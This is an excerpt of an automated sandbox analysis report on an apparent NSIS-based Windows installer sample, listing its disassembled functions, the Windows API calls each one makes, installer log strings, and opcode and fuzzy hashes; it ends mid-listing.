Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileGlobalInfoVersion$AllocFreeQuerySizeValuewsprintf
String ID:
API String ID: 3376005127-0
Opcode ID: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction ID: 606d2f288e59f9406d2e88b5b0598c54d729d8d595f649ff0f3e4a994beab86c
Opcode Fuzzy Hash: 6f3e0dbebcfa7f75c0754c170d72e8097fcb7c93b116c2da6e8eed637ff4f305
Instruction Fuzzy Hash: 82115E72900109AFCF00EFA1DD45DAE7BB8EF04344F10403AFA09F61A1D7799A40DB19

Function 00402B23 Relevance: 7.6, APIs: 5, Instructions: 54
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GlobalAlloc.KERNEL32(00000040,00002004), ref: 00402B2B
WideCharToMultiByte.KERNEL32(?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B61
lstrlenA.KERNEL32(?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B6A
WriteFile.KERNEL32(00000000,?,?,00000000,?,?,?,?,0040F0D0,000000FF,?,00002004,?,?,00000011), ref: 00402B85

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AllocByteCharFileGlobalMultiWideWritelstrlen
String ID:
API String ID: 2568930968-0
Opcode ID: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction ID: 5d007b3c2ae3d1ce6b2586a1921c4ad46276280cee2e515d5d1d957ff8a092fa
Opcode Fuzzy Hash: 02f149ecbdf3f63b5c58a8b7f5a2f789e982e3470d3956ff315881f03770554e
Instruction Fuzzy Hash: 76016171500205FBDB14AF70DE48D9E3B78EF05359F10443AF646B91E1D6798982DB68

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775
DatesConsider, xrefs: 00402770
<RM>, xrefs: 00402713

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$DatesConsider$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-950464524
Opcode ID: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction ID: 1675f45263e21dacb3bd3d3c28f4c469aa899418fcec56767b4290250f933745
Opcode Fuzzy Hash: ebd727ba1388524afa6f7b5c72e47581e9b4ec966d204d2154218169f3a3a122
Instruction Fuzzy Hash: 05014F70D40319BADB10BFA18D859AF7A78AF09304F10403FF11A761E3D7B80A408BAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004CB0B0,?), ref: 00402202

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226
ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction ID: bbc106df3db47d5a89d2587a4e22f40687ed87c50c6518a2742e337a88eb4af1
Opcode Fuzzy Hash: 0e9dd1e26526b91e1c41cfd2ad6e78dbbf82426293fff8cc21759efb88a5ec27
Instruction Fuzzy Hash: E001F7B2B4021476DB2077B69C87F6B2A5CDB41764B20047BF502F20E3E5BD88009139

Function 00405E7F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00405E9D
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004037FE,004D30C0,004D70C8), ref: 00405EB8

Strings

nsa, xrefs: 00405E8C

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction ID: bbb7b3741c82bae03d84fc31e008e00914f4f4b6280f54d22115683b6c602e07
Opcode Fuzzy Hash: 74c86182fa67e47248f5fe200c9c22c18b8020e4291a34397a9b0f642818afda
Instruction Fuzzy Hash: 39F0F635600604BBDB00CF55DD05A9FBBBDEF90310F00803BE944E7140E6B09E00C798

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction ID: bfe0de145d0e58e27592ef60cc9cda220d4f3e6bacb950e19a0f62fa040dbd34
Opcode Fuzzy Hash: 0616bcda597e9750e62a76ee812eb00f220ec1a404151e7fe1b3dec3a2ed7f78
Instruction Fuzzy Hash: F1E09232A05111DBCB08FBB5A74A5AE76B4EA9532A721007FE143F20D0DABD8D01C62D

Function 004078C5 Relevance: 5.2, APIs: 4, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction ID: 5b61ba0e549d4a34e11b5feda41afe9ae6537485a044c30e59ebd23bda5797f4
Opcode Fuzzy Hash: 34a0988d6b53cb3e5c5cab68a25a042cd6e02f2342b0fd139447399893daab40
Instruction Fuzzy Hash: BCA14771908248DBEF18CF28C8946AD3BB1FB44359F14812AFC56AB280D738E985DF85

Function 00407AC3 Relevance: 5.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction ID: 0868455ade8710e2db62ea7c97591ecaf8a07f5330254cde648c5a00cf1b77b0
Opcode Fuzzy Hash: 5706958415abe038d8bc904968b39eb1c0ab21271a5e62a9b552e9204fe8a243
Instruction Fuzzy Hash: 30912871908248DBEF14CF18C8947A93BB1FF44359F14812AFC5AAB291D738E985DF89

Function 00407312 Relevance: 5.2, APIs: 4, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction ID: 3981f1dd08afc316d24d9ed5113be2a17ca7da729ed8f25fba603efd3ef4d826
Opcode Fuzzy Hash: 11cd2314bdb72fbaaf254cc8ab9d4ea11bc1da16cf3644787fbca669908488dc
Instruction Fuzzy Hash: 39815931908248DBEF14CF29C8446AE3BB1FF44355F10812AFC66AB291D778E985DF86

Function 00407752 Relevance: 5.2, APIs: 4, Instructions: 179COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction ID: 01891581271c5a124b16634c3a8992e7a6857e255b4271240234ec945a90a24d
Opcode Fuzzy Hash: f6fc324ba2a3154e694309e6bae2168c7942ffc843c4c16a3e425845c98615c2
Instruction Fuzzy Hash: 73713571908248DBEF18CF28C894AAD3BF1FB44355F14812AFC56AB291D738E985DF85

Function 00407854 Relevance: 5.2, APIs: 4, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction ID: 94e3b44a92ae0aa4503ed5f8848dd13d39bc4d5c5e61625994f203468061122b
Opcode Fuzzy Hash: 50afaaeaa81713190e6368922b68e72c74c0f8af07b8473edddf34e42917c2b6
Instruction Fuzzy Hash: 25713671908248DBEF18CF19C894BA93BF1FB44345F10812AFC56AA291C738E985DF86

Function 004077B2 Relevance: 5.2, APIs: 4, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction ID: 61f7b93237898aea062553d5d4b8719da8ac7eccb5076a10c91df3859b53dd49
Opcode Fuzzy Hash: c1e8f36220be8f98feef1199d10cba6751babd433578914259dc57061f930aad
Instruction Fuzzy Hash: 98612771908248DBEF18CF19C894BAD3BF1FB44345F14812AFC56AA291C738E985DF86

Function 00407C5F Relevance: 5.2, APIs: 4, Instructions: 156memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNELBASE(?), ref: 004073C5
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 004073CE
GlobalFree.KERNELBASE(?), ref: 0040743D
GlobalAlloc.KERNELBASE(00000040,?,00000000,0041F150,00004000), ref: 00407448

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: Global$AllocFree
String ID:
API String ID: 3394109436-0
Opcode ID: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction ID: da36524f31269fd1e9de8fc6705d7123eeae9c681c0d19372ba3dadca10d6d3f
Opcode Fuzzy Hash: b4e0c1391c46ae50f73649b3c762cd7b27ce57b462bacfc2a9e8da119b19f928
Instruction Fuzzy Hash: 81513871918248EBEF18CF19C894AAD3BF1FF44345F10812AFC56AA291C738E985DF85

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction ID: d71d45502f518029c3ce7990b7c8d381ac94a1bb539c673c2af025244294d997
Opcode Fuzzy Hash: 5a31974c6ff286c329462761e498969acf5a6972bf7682297af78da516706e42
Instruction Fuzzy Hash: 96F0F471A10220DFD7555B74DD04B273699AB80361F24463BF911F62F1E6B8DC528B4E

Function 00405E50 Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035C7,004DF0D8,80000000,00000003,?,?,?,00000000,00403A47,?), ref: 00405E54
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.2034360525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2034331592.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034399101.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034434668.0000000000461000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2034541039.00000000004F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_installer_1.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

